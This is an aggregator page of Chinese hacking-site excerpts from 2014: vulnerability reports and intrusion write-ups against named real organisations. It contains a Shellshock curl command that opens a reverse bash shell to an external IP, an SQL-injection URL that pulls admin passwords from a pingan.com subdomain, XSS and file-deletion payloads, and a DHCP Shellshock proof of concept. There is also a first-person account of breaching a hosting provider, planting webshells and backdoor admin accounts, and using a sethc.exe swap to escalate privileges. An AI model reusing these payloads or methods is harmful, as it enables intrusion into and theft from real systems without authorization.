记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

敞开的地狱之门:Kerberos协议的滥用

‍‍‍‍‍微软的活动目录默认使用Kerberos处理认证请求。在BlackHat 2014上神器Mimikatz的作者剖析了微软实现的Kerberos协议中存在的安全缺陷,并通过神器Mimikatz新添功能“Golden Ticket”展示了如何利用这些安全缺陷,让Kerberos把守的地狱之门为大家敞开。‍‍‍一、快速介绍Kerberos 是Windows活动目录中使用的客户/服务器认证协议,为通信双方提供双向身份认证。相互认证或请求服务的实体被称为委托人(principal)。参与的中央服务器被称为密钥分发中心(简称KDC)。KDC有两个服务组成:身份验证服务(Authentication Server,简称AS)和票据授予服务(Ticket Granting Server,简称T
发布时间:2014-10-02 19:25 | 阅读:100 | 评论:0 | 标签:系统安全 网络安全 blackhat2014 Kerberos Mimikatz

【投稿】简单渗透某IDC机房实录【上】

由于最近的FQ的东西已死,想弄个机器去看youtube。就随手GOOGLE论坛,寻找目标,为什么找论坛呢,一般我都习惯搞上传,论坛当然是容易发表文章的地方。随便挑了一个目标,浏览了一下,发现是某论坛程序的。帖子基本更新很慢,既然更新这么慢,管理肯定很懒,说不定这程序补丁都还没打,甚至连服务都没打补丁,提权也希望也大一些。早些年的时候这论坛爆过EXP。弄了个某大大写的程序直接打上。好家伙,提示写入成功。 尝试访问。结果悲剧的变成了下载文件。 换了目录以后重新写。终于拿到了WEBSHELL。 目测网站根目录来看应该该是个VPS之类的虚拟主机,无所谓,只要能做个代理FQ就行。大马传之,看了下版本信息,这内核果然低的离谱。反弹之,结果发现基本啥命令都用不了,不过无所谓了。 找了个可执行权限的目录用explo
发布时间:2014-10-02 14:15 | 阅读:234 | 评论:0 | 标签:渗透实例 web安全 内网渗透 权限提升 渗透测试

【投稿】简单渗透某IDC机房实录【下】

搞定了一台机器,接下来就开始留权限做后门了。做后门的就随便选了一台机器,由于之前已经从IDC机房数据库获得了管理员密码,这里就自己建立一个admin的管理员权限用户,相当于提权以后在没获得管理员密码的情况下做个后门演示吧,至于为什么做WINDOWS而不做LINUX的呢,因为没有哪个管理员用LIUNX机器来作为工作机器,要想保住整个段的权限,无意是控制住管理员的机器才是最好的办法,最好选择能于管理员的工作机器进行通信的服务器来做后门,控制好才机会不丢。其次LINUX的后门要编译各种内核安装头文件啥的,还要去google搜索,也就不做了,说白了LINUX的后门无非就是Rootkit而已,在放置几个suid的shell,利用ava隐藏一下。其实最主要还是通信问题,留住跳板才有机会,不然你空有一堆管理密码,没办法进行通
发布时间:2014-10-02 14:15 | 阅读:309 | 评论:0 | 标签:渗透实例 内网渗透 权限提升 渗透测试

小米账户漏洞在miui加密码锁屏的情况下可以绕过锁屏改变小米账户的密码,获取账号信息。

很多人认为手机加了锁屏密码就很安全了,就算丢了也可以根据小米云服务清除数据、找回手机。但是,它真的安全吗?看我的破解经历。一、首先,我拾到一部手机,我可以把sim卡换到其他手机,获得手机号码,然后打开 https://i.mi.com/ 单击”忘记密码?“输入手机号单击下一步,你会收到短息验证码,输入验证码你就可以更改小米账户密码,现在,这个账户成为你的了。二、如果你碰巧知道这部手机的号码,并且不想将sim装其他手机或者不能,还可以这么办。这是锁屏界面用另一号码给这部手机打电话,出现将圆圈滑到上面发短信选择最下部的”自定义短信“进入短信编写页面按界面左下角的加号,出现在界面中选择”图片“出现这时登陆 https://i.mi.com/ 单击”忘记密码?“输入手机号单击下一步,这时手机上会出现输入验证码你就可以更
发布时间:2014-10-02 13:11 | 阅读:152 | 评论:0 | 标签:加密 漏洞

Colorwork存储型XSS漏洞可获取其他用户权限(3枚打包)

日历、任务、签名处未过滤,导致存储型XSS别的伙伴进入团队时会中招。可获得Cookie劫持账户。 漏洞证明: 修复方案:#1、文档那个地方应该还有,可能你们服务器出了些问题所以打不开那个网页了……#2、过滤危险字符。#3、自查啊!在同一个地方跌倒两次了。
发布时间:2014-10-02 13:11 | 阅读:222 | 评论:0 | 标签:xss 漏洞

某省民政局专用CMS无需登录越权重置任意账户密码/任意文件上传GetShell

http://wooyun.org/bugs/wooyun-2010-059172 Huc-Unis提交过山西省多个民政网(还有少部分非民政的~),使用了同一CMS导致存在越权重置任意账户密码及任意文件上传GetShell 以下案例摘取自前人提交的(只是枚举案例,网站后面跟的参数跟要提交的漏洞无关):http://www.sxmz.gov.cn/content/topicdeal.jsp?id=1&action=read 山西省民政网http://www.sxycmz.gov.cn/content/topicdeal.jsp?id=1&action=read 运城民政信息网http://www.jcmzj.gov.cn/content/topicdeal.jsp?id=1&actio
发布时间:2014-10-02 13:10 | 阅读:114 | 评论:0 | 标签:cms

完美时空某处log系统未授权访问导致用户信息泄漏

http://221.228.210.187:8080/log/一天不止500+吧然后有账号,userID 合作账号类型 ticket 不知道能不能掌握账号呢?然后社工啊真不错 漏洞证明:http://221.228.210.187:8080/log/一天不止500+吧然后有账号,userID 合作账号类型 ticket 不知道能不能掌握账号呢?然后社工啊真不错 修复方案:限制访问
发布时间:2014-10-02 13:10 | 阅读:278 | 评论:0 | 标签:无

Srun3000计费系统任意文件下载漏洞(直接获取管理密码)

版本:版本 Srun3000 [3.00rc14.17.4] 使用量还是相当多的,主要为各大高校:(url不列出来了,太暴力,怕自己学校的也被爆。1.任意文件下载漏洞漏洞文件/srun3/srun/services/modules/login/controller/login_controller.php代码/** * 下载一个文件 * */ // 此处存在任意文件下载漏洞--fuck public function download(){ global $file; $this->model->download_file($file); }download_file文件路径为/srun3/srun/services/module
发布时间:2014-10-02 13:10 | 阅读:186 | 评论:0 | 标签:漏洞

搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞

下载搜狗高速浏览器5.0http://ie.sogou.com/搜狗高速浏览器一直都是都是基于IE内核的浏览器问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value,从而就可以实现跨域- -. 漏洞证明:构造两个测试跨域的POC:test1.html<html><head><title>test1</title></head><body>{}body{font-family:WooYun</body></html>test2.html<html><head><title>test2</title></head><body
发布时间:2014-10-01 21:00 | 阅读:651 | 评论:0 | 标签:漏洞

中国平安某分站SQL注入一枚

明显的dedecms程序。。。然后用exp秒了一下。。 漏洞证明:附上exp:http://jieqian.pingan.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%27%20or%20mid=@%60%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=applica
发布时间:2014-10-01 21:00 | 阅读:365 | 评论:0 | 标签:注入

寺库的一个命令执行漏洞(偶然发现)

以前寺库搞活动的时候用手机客户端买过东西,今天在对手机抓包的时候无意中发现了一个链接这不是有可能存在执行命令漏洞吗?赶紧试试!!窝巢,竟然是root权限,来看看shadow文件吓得我赶紧来提交了 漏洞证明: 修复方案:升级struts2版本
发布时间:2014-10-01 21:00 | 阅读:832 | 评论:0 | 标签:漏洞

dns.com.cn存在BASH漏洞可反弹

dns.com.cn存在BASH漏洞可反弹curl -A "() { :; }; /bin/bash -i > /dev/tcp/128.199.213.124/2345 0<&1 2>&1" https://mailmx.dns.com.cn/cgi-bin/madmin.cgi -v 漏洞证明:https://mailmx.dns.com.cn/cgi-bin/madmin.cgi/sa?locale=ja_JP.utf-8L4_2 修复方案:更新官方补丁。
发布时间:2014-10-01 21:00 | 阅读:443 | 评论:0 | 标签:漏洞

多玩YY客户端BUG(泄露用户登录IP造成用户网络中断)

利用代码[dyimg]hfs图片地址[/dyimg]YY上玩DDOS的太多,相信官方也很关注!所以用户的IP是很重要的! 漏洞证明:利用代码[dyimg]hfs图片地址[/dyimg] 修复方案:我就搞不懂为什么客户端能发这种标签!是不是要添加些过滤代码
发布时间:2014-10-01 21:00 | 阅读:857 | 评论:0 | 标签:无

代码审计系列9: OEcms 远程代码执行(CSRF)

问题1.后台-界面模板-模板管理-模板文件 处存在 任意目录遍历、任意文件删除、任意文件修改、绝对路径泄露等漏洞。问题2.整个后台都没有对CSRF进行任何防护措施。可以导致攻击者劫持操纵作后台,添加管理账户等危险操作。 漏洞证明:例:目录遍历http://localhost/admincp.php?c=templet&dir=......例:任意文件修改 例:任意文件删除http://localhost/admincp.php?c=templet&a=delfile&id=%5C%5C..%5C%5C..%5C%5C..%5C%5C%2Findex.php远程删掉index.php文件例:绝对路径泄露再证明一个最危险的例子。通过 问题1+问题2 可以实现对该CMS进行CSRF执行远程
发布时间:2014-10-01 12:55 | 阅读:705 | 评论:0 | 标签:CSRF cms

破壳漏洞DHCP RCE的概念证明

DHCP bash shellshock POC (1) 只要关于任何DHCP字符串的值都有机会被利用。 值114是URL,是一个能可靠被使用的字符串。 (2) 在互联网上启动一个DHCP服务器,并且将其他选项中的值设置为114并写入如下字符串:(){ignored;}echo'foo' 用任何你想要客户去执行的小命令来代替“echo ‘foo’”的一部分. 大部分用户会使用root来允许会运行DHCP脚本,但可能没有一个完整的环境PATH变量定义。 (3)  我们可以通过触发一个DHCP地址更新来进行测试,当接口有响应是通常是利用成功了。 【翻译@91Ri.org团队】
发布时间:2014-10-01 05:55 | 阅读:1165 | 评论:0 | 标签:渗透实例 内网渗透 渗透测试 漏洞

某通讯设备有限公司客户管理平台服务器沦陷泄漏信息+提权技巧

http://119.84.60.43:9000/superadmin/index.action先看漏洞存在的地方这尼玛有意思额,服务器被降权了但是泄漏了网站http://www.sy440.com/然后上菜刀现在提权吧前面说被降权了,怎么提权呢?这里不用0day什么的用替换法将cmd.exe 换成sethc.exe 漏洞证明:于是这样我上了服务器看到了发信记录土豪啊合作商有大众啊还有雪佛兰还有其他的什么火锅店啊,好像什么都齐了(都是会员才留号码吧?)如果用来做推销敲诈勒索什么的好爽啊 修复方案:你的保密呢?你的承诺呢?升级打补丁
发布时间:2014-10-01 04:50 | 阅读:1387 | 评论:0 | 标签:提权

SAE允许JVM内存对象直接读写操作

//本来想写篇文章的,但怕牵扯到某些公司云沙盒环境 sun.misc.Unsafe是当年sun公司操作内存的内部API,没有公开.有些JDK已经去掉了这个类.但大部分的jdk依然保留着. sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc;import java.lang.reflect.Field;import java.lang.reflect.Modifier;import java.security.ProtectionDomain;import sun.reflect.Reflection;public final class Unsafe{ private static final Unsafe theUnsafe; public sta
发布时间:2014-10-01 04:50 | 阅读:343 | 评论:0 | 标签:无

赶集网主站2个存储型XSS + 小蠕虫

漏洞存在于 店铺管理中心 > 服务店铺【长沙装修/装饰】房屋漏水专业维修 > 信息管理在添加分店的地址那 未做任何过滤 可直接插入!还有一处位于店铺描述做了过滤 但是不能跳出meta外 店铺描述的payload: 0,url=javascript:alert(/Jin/)" HTTP-EQUIV="refresh地址:http://cs.ganji.com/fuwu_dian/1121114795x/得用safari 打开才能弹。。继续说上面那个店铺分店地址的存储型XSS那个xss可以任何浏览器都执行XSS,而赶集网本身未做cookie做httponly的保护 所以。。你懂的!另外也构造了个小蠕虫 只要你有店铺就会修改掉你的店铺地址为 xss代码地址为:http://www.ga
发布时间:2014-09-30 20:45 | 阅读:688 | 评论:0 | 标签:xss

公告

❤ 关注Hackdig微博,点击下方按钮⇩
关注Hackdig微信,每天推送精选文章
⇩扫描二维码,一切都会更方便哦⇩

工具

广而告知

标签云

友情链接